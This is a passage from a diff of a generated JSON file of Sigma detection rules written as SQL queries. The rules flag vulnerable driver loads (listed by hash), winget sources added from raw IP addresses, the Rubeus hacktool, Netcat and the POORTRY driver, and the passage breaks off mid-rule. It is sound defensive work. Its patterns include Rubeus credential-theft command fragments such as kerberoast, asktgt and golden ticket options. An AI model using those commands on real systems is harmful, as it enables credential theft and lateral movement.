'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE 